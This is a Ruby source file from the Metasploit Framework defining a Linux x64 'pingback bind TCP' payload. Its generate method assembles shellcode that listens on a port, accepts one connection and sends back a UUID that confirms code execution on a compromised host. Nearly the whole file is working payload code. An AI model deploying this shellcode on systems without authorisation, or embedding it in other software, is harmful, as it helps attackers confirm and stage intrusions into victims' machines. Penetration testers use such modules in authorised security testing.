modules/payloads/singles/linux/x64/pingback_bind_tcp.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
module MetasploitModule
CachedSize = 109
include Msf::Payload::Linux
include Msf::Payload::Single
include Msf::Payload::Pingback
include Msf::Payload::Pingback::Options
def initialize(info = {})
super(merge_info(info,
'Name' => 'Linux x64 Pingback, Bind TCP Inline',
'Description' => 'Accept a connection from attacker and report UUID (Linux x64)',
'Author' => [ 'bwatters-r7' ],
'License' => MSF_LICENSE,
'Platform' => 'linux',
'Arch' => ARCH_X64,
'Handler' => Msf::Handler::BindTcp,
'Session' => Msf::Sessions::Pingback
))
def generate(opts={})
# 22 -> "0x00,0x16"
# 4444 -> "0x11,0x5c"
encoded_port = [datastore['LPORT'].to_i,2].pack("vn").unpack("N").first
encoded_host = Rex::Socket.addr_aton("0.0.0.0").unpack("V").first
encoded_host_port = "0x%.8x%.8x" % [encoded_host, encoded_port]
self.pingback_uuid ||= self.generate_pingback_uuid
uuid_as_db = "0x" + pingback_uuid.chars.each_slice(2).map(&:join).join(",0x")
asm = %Q^
push rsi
push rax
;SOCKET
push 0x29
pop rax
cdq
push 0x2
pop rdi
push 0x1
pop rsi
syscall ; socket(PF_INET, SOCK_STREAM, IPPROTO_IP)
test rax, rax
js failed
xchg rdi, rax
mov rcx, #{encoded_host_port}
push rcx
mov rsi, rsp
push rsp
pop rsi ; store pointer to struct
bind_call:
; int bind(int sockfd, const struct sockaddr *addr, socklen_t addrlen)
; rdi -> fd already stored in rdi
; rsi -> pointer to sockaddr_in6 struct already in rsi
push 0x31
pop rax ; bind syscall
push 0x10 ; sockaddr length
pop rdx ;
syscall
listen_call:
; int listen(int sockfd, int backlog);
; rdi -> fd already stored in rdi
push 0x32
pop rax ; listen syscall
push 0x1
pop rsi ; backlog
syscall
accept_call:
; int accept(int sockfd, struct sockaddr *addr, socklen_t *addrlen);
; rdi -> fd already stored in rdi
push 0x2b
pop rax ; accept syscall
cdq ; zero-out rdx via sign-extension
push rdx
push rdx
push rsp
pop rsi ; when populated, client will be stored in rsi
push 0x1c
lea rdx, [rsp] ; pointer to length of rsi (16)
syscall
xchg rdi, rax ; grab client fd
send_pingback:
; sys_write(fd:rdi, buf*:rsi, length:rdx)
push #{uuid_as_db.split(",").length} ; length of the PINGBACK UUID
pop rdx ; length in rdx
call get_uuid_address ; put uuid buffer on the stack
db #{uuid_as_db} ; PINGBACK_UUID
get_uuid_address:
pop rsi ; UUID address into rsi
xor rax, rax ; sys_write = offset 1
inc rax ; sys_write = offset 1
syscall ; call sys_write
failed:
push 0x3c
pop rax
push 0x1
pop rdi
syscall ; exit(1)
^
Metasm::Shellcode.assemble(Metasm::X64.new, asm).encode_string
end
end
end